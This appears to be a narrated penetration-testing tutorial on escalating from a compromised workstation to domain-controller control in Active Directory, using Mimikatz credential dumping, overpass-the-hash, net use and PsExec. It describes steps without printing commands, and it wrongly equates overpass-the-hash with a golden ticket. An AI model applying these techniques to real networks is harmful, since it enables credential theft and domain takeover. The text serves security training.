Introduction
Hey everyone, and welcome back! In this session, I’m going to show you one of my favorite methods for privilege escalation within an Active Directory environment. I’ll be starting from a scenario where I’ve already gained initial access to a regular workstation on the network, but I don’t have control over the domain controller itself… yet. 😉
Step 1: Dumping Passwords with Mimikatz
My first move on the compromised workstation is to fire up Mimikatz. My goal here is to dump any and all cached passwords from the machine’s memory. The key thing I’m hoping for is that the domain administrator has, at some point, logged into this specific workstation. If they have, their NTLM hash (a scrambled version of their password) will be sitting right there in the memory, just waiting for me to grab it.
Step 2: The “Overpass the Hash” Technique
Once I have that precious NTLM hash, it’s time for some lateral movement. I use a technique called “overpass the hash.” The main idea is to take that NTLM hash and use it to forge a Kerberos ticket.
For those who don’t know, Kerberos is the authentication system that Active Directory uses. It’s like a digital bouncer that grants you access to different parts of the network using these “tickets.” By using the admin’s NTLM hash, I can essentially create a golden ticket for myself.
Step 3: Launching a PowerShell Process
With my forged Kerberos ticket in hand, I use Mimikatz again to launch a PowerShell process directly on the domain controller. The magic here is that this process runs as if the administrator themselves launched it. This gives me a direct line of communication to the domain controller, all from the comfort of the workstation I originally compromised.
Step 4: Getting My Tickets, Please!
Now, even though I have a PowerShell process running, I don’t have any actual Kerberos tickets yet, which limits what I can do. To fix this, I need to perform some kind of interactive action to force the system to generate a ticket for me. A simple way to do this is to try and access a shared folder on the domain controller using the net use command. This little nudge is all it takes to get my ticket-granting ticket, unlocking full interaction with the system.
Step 5: Gaining Full Control with PsExec
The final step is to upgrade my PowerShell process into a full-blown command prompt on the administrator’s account. For this, I use a handy tool called PsExec.
In this particular scenario, I ran into a small hiccup because PsExec wasn’t already on the machine. No problem! I just quickly downloaded it from the official Sysinternals website directly onto the compromised workstation. After unzipping the files, I was able to launch PsExec and gain complete system-level access to the domain controller. Game over. 🏆
A Crucial Caveat
I want to stress one very important point: this specific attack only works if the domain administrator has previously logged into the workstation I compromised. If their credentials aren’t cached in memory, Mimikatz can’t grab them, and the whole attack falls apart. This is why it’s so important to enumerate who is logged in and what sessions are active during the initial stages of a penetration test.
There are many ways to climb the privilege ladder in Active Directory, but this is one of my go-to methods. I’ll be back with more tactics and techniques in future videos, so stay tuned!
